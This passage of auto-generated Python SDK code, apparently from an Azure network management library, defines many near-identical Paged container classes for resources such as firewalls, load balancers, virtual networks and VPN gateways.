'str'},\n 'current_page': {'key': 'value', 'type': '[ApplicationSecurityGroup]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ApplicationSecurityGroupPaged, self).__init__(*args, **kwargs)\nclass AvailableDelegationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AvailableDelegation ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AvailableDelegation]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AvailableDelegationPaged, self).__init__(*args, **kwargs)\nclass AvailableServiceAliasPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AvailableServiceAlias ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AvailableServiceAlias]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AvailableServiceAliasPaged, self).__init__(*args, **kwargs)\nclass AzureFirewallPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AzureFirewall ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AzureFirewall]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AzureFirewallPaged, self).__init__(*args, **kwargs)\nclass AzureFirewallFqdnTagPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AzureFirewallFqdnTag ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AzureFirewallFqdnTag]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AzureFirewallFqdnTagPaged, self).__init__(*args, **kwargs)\nclass BastionHostPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`BastionHost ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[BastionHost]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(BastionHostPaged, 
self).__init__(*args, **kwargs)\nclass DdosProtectionPlanPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`DdosProtectionPlan ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[DdosProtectionPlan]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(DdosProtectionPlanPaged, self).__init__(*args, **kwargs)\nclass EndpointServiceResultPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`EndpointServiceResult ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[EndpointServiceResult]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(EndpointServiceResultPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCircuitAuthorizationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCircuitAuthorization ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCircuitAuthorization]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCircuitAuthorizationPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCircuitPeeringPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCircuitPeering ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCircuitPeering]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCircuitPeeringPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCircuitConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCircuitConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCircuitConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCircuitConnectionPaged, self).__init__(*args, **kwargs)\nclass PeerExpressRouteCircuitConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PeerExpressRouteCircuitConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PeerExpressRouteCircuitConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PeerExpressRouteCircuitConnectionPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCircuitPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCircuit ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCircuit]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCircuitPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteServiceProviderPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteServiceProvider ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteServiceProvider]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteServiceProviderPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCrossConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of 
:class:`ExpressRouteCrossConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCrossConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCrossConnectionPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteCrossConnectionPeeringPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteCrossConnectionPeering ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteCrossConnectionPeering]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteCrossConnectionPeeringPaged, self).__init__(*args, **kwargs)\nclass ExpressRoutePortsLocationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRoutePortsLocation ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRoutePortsLocation]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRoutePortsLocationPaged, self).__init__(*args, **kwargs)\nclass ExpressRoutePortPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRoutePort ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRoutePort]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRoutePortPaged, self).__init__(*args, **kwargs)\nclass ExpressRouteLinkPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ExpressRouteLink ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ExpressRouteLink]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ExpressRouteLinkPaged, self).__init__(*args, **kwargs)\nclass FirewallPolicyPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`FirewallPolicy ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[FirewallPolicy]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(FirewallPolicyPaged, self).__init__(*args, **kwargs)\nclass FirewallPolicyRuleGroupPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`FirewallPolicyRuleGroup ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[FirewallPolicyRuleGroup]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(FirewallPolicyRuleGroupPaged, self).__init__(*args, **kwargs)\nclass IpGroupPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`IpGroup ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[IpGroup]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(IpGroupPaged, self).__init__(*args, **kwargs)\nclass LoadBalancerPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`LoadBalancer ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[LoadBalancer]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(LoadBalancerPaged, self).__init__(*args, **kwargs)\nclass BackendAddressPoolPaged(Paged):\n \"\"\"\n 
A paging container for iterating over a list of :class:`BackendAddressPool ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[BackendAddressPool]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(BackendAddressPoolPaged, self).__init__(*args, **kwargs)\nclass FrontendIPConfigurationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`FrontendIPConfiguration ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[FrontendIPConfiguration]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(FrontendIPConfigurationPaged, self).__init__(*args, **kwargs)\nclass InboundNatRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`InboundNatRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[InboundNatRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(InboundNatRulePaged, self).__init__(*args, **kwargs)\nclass LoadBalancingRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`LoadBalancingRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[LoadBalancingRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(LoadBalancingRulePaged, self).__init__(*args, **kwargs)\nclass OutboundRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`OutboundRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[OutboundRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(OutboundRulePaged, self).__init__(*args, **kwargs)\nclass NetworkInterfacePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkInterface ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkInterface]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkInterfacePaged, self).__init__(*args, **kwargs)\nclass ProbePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Probe ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Probe]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ProbePaged, self).__init__(*args, **kwargs)\nclass NatGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NatGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NatGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NatGatewayPaged, self).__init__(*args, **kwargs)\nclass NetworkInterfaceIPConfigurationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkInterfaceIPConfiguration ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkInterfaceIPConfiguration]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkInterfaceIPConfigurationPaged, self).__init__(*args, **kwargs)\nclass NetworkInterfaceTapConfigurationPaged(Paged):\n \"\"\"\n A paging container for iterating over a 
list of :class:`NetworkInterfaceTapConfiguration ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkInterfaceTapConfiguration]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkInterfaceTapConfigurationPaged, self).__init__(*args, **kwargs)\nclass NetworkProfilePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkProfile ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkProfile]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkProfilePaged, self).__init__(*args, **kwargs)\nclass NetworkSecurityGroupPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkSecurityGroup ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkSecurityGroup]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkSecurityGroupPaged, self).__init__(*args, **kwargs)\nclass SecurityRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`SecurityRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[SecurityRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(SecurityRulePaged, self).__init__(*args, **kwargs)\nclass NetworkWatcherPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`NetworkWatcher ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[NetworkWatcher]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(NetworkWatcherPaged, self).__init__(*args, **kwargs)\nclass PacketCaptureResultPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PacketCaptureResult ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PacketCaptureResult]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PacketCaptureResultPaged, self).__init__(*args, **kwargs)\nclass ConnectionMonitorResultPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ConnectionMonitorResult ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ConnectionMonitorResult]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ConnectionMonitorResultPaged, self).__init__(*args, **kwargs)\nclass OperationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Operation ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Operation]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(OperationPaged, self).__init__(*args, **kwargs)\nclass PrivateEndpointPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PrivateEndpoint ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PrivateEndpoint]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PrivateEndpointPaged, self).__init__(*args, **kwargs)\nclass AvailablePrivateEndpointTypePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of 
:class:`AvailablePrivateEndpointType ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AvailablePrivateEndpointType]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AvailablePrivateEndpointTypePaged, self).__init__(*args, **kwargs)\nclass PrivateLinkServicePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PrivateLinkService ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PrivateLinkService]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PrivateLinkServicePaged, self).__init__(*args, **kwargs)\nclass PrivateEndpointConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PrivateEndpointConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PrivateEndpointConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PrivateEndpointConnectionPaged, self).__init__(*args, **kwargs)\nclass AutoApprovedPrivateLinkServicePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`AutoApprovedPrivateLinkService ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[AutoApprovedPrivateLinkService]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(AutoApprovedPrivateLinkServicePaged, self).__init__(*args, **kwargs)\nclass PublicIPAddressPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PublicIPAddress ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PublicIPAddress]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PublicIPAddressPaged, self).__init__(*args, **kwargs)\nclass PublicIPPrefixPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`PublicIPPrefix ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[PublicIPPrefix]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(PublicIPPrefixPaged, self).__init__(*args, **kwargs)\nclass RouteFilterPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`RouteFilter ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[RouteFilter]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(RouteFilterPaged, self).__init__(*args, **kwargs)\nclass RouteFilterRulePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`RouteFilterRule ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[RouteFilterRule]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(RouteFilterRulePaged, self).__init__(*args, **kwargs)\nclass RouteTablePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`RouteTable ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[RouteTable]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(RouteTablePaged, self).__init__(*args, **kwargs)\nclass RoutePaged(Paged):\n \"\"\"\n A paging container for iterating over a list 
of :class:`Route ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Route]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(RoutePaged, self).__init__(*args, **kwargs)\nclass BgpServiceCommunityPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`BgpServiceCommunity ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[BgpServiceCommunity]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(BgpServiceCommunityPaged, self).__init__(*args, **kwargs)\nclass ServiceEndpointPolicyPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ServiceEndpointPolicy ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ServiceEndpointPolicy]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ServiceEndpointPolicyPaged, self).__init__(*args, **kwargs)\nclass ServiceEndpointPolicyDefinitionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ServiceEndpointPolicyDefinition ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ServiceEndpointPolicyDefinition]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ServiceEndpointPolicyDefinitionPaged, self).__init__(*args, **kwargs)\nclass UsagePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Usage ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Usage]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(UsagePaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetwork ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetwork]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkUsagePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkUsage ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkUsage]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkUsagePaged, self).__init__(*args, **kwargs)\nclass SubnetPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`Subnet ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[Subnet]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(SubnetPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkPeeringPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkPeering ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkPeering]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkPeeringPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkGateway ` object\n \"\"\"\n\n 
_attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkGatewayPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkGatewayConnectionListEntityPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkGatewayConnectionListEntity ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkGatewayConnectionListEntity]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkGatewayConnectionListEntityPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkGatewayConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkGatewayConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkGatewayConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkGatewayConnectionPaged, self).__init__(*args, **kwargs)\nclass LocalNetworkGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`LocalNetworkGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[LocalNetworkGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(LocalNetworkGatewayPaged, self).__init__(*args, **kwargs)\nclass VirtualNetworkTapPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualNetworkTap ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualNetworkTap]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualNetworkTapPaged, self).__init__(*args, **kwargs)\nclass VirtualRouterPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualRouter ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualRouter]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualRouterPaged, self).__init__(*args, **kwargs)\nclass VirtualRouterPeeringPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualRouterPeering ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualRouterPeering]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualRouterPeeringPaged, self).__init__(*args, **kwargs)\nclass VirtualWANPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualWAN ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualWAN]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualWANPaged, self).__init__(*args, **kwargs)\nclass VpnSitePaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnSite ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnSite]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnSitePaged, self).__init__(*args, **kwargs)\nclass VpnSiteLinkPaged(Paged):\n \"\"\"\n A paging container for iterating 
over a list of :class:`VpnSiteLink ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnSiteLink]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnSiteLinkPaged, self).__init__(*args, **kwargs)\nclass VpnServerConfigurationPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnServerConfiguration ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnServerConfiguration]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnServerConfigurationPaged, self).__init__(*args, **kwargs)\nclass VirtualHubPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualHub ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualHub]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualHubPaged, self).__init__(*args, **kwargs)\nclass HubVirtualNetworkConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`HubVirtualNetworkConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[HubVirtualNetworkConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(HubVirtualNetworkConnectionPaged, self).__init__(*args, **kwargs)\nclass VpnGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnGatewayPaged, self).__init__(*args, **kwargs)\nclass VpnConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnConnectionPaged, self).__init__(*args, **kwargs)\nclass VpnSiteLinkConnectionPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VpnSiteLinkConnection ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VpnSiteLinkConnection]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VpnSiteLinkConnectionPaged, self).__init__(*args, **kwargs)\nclass 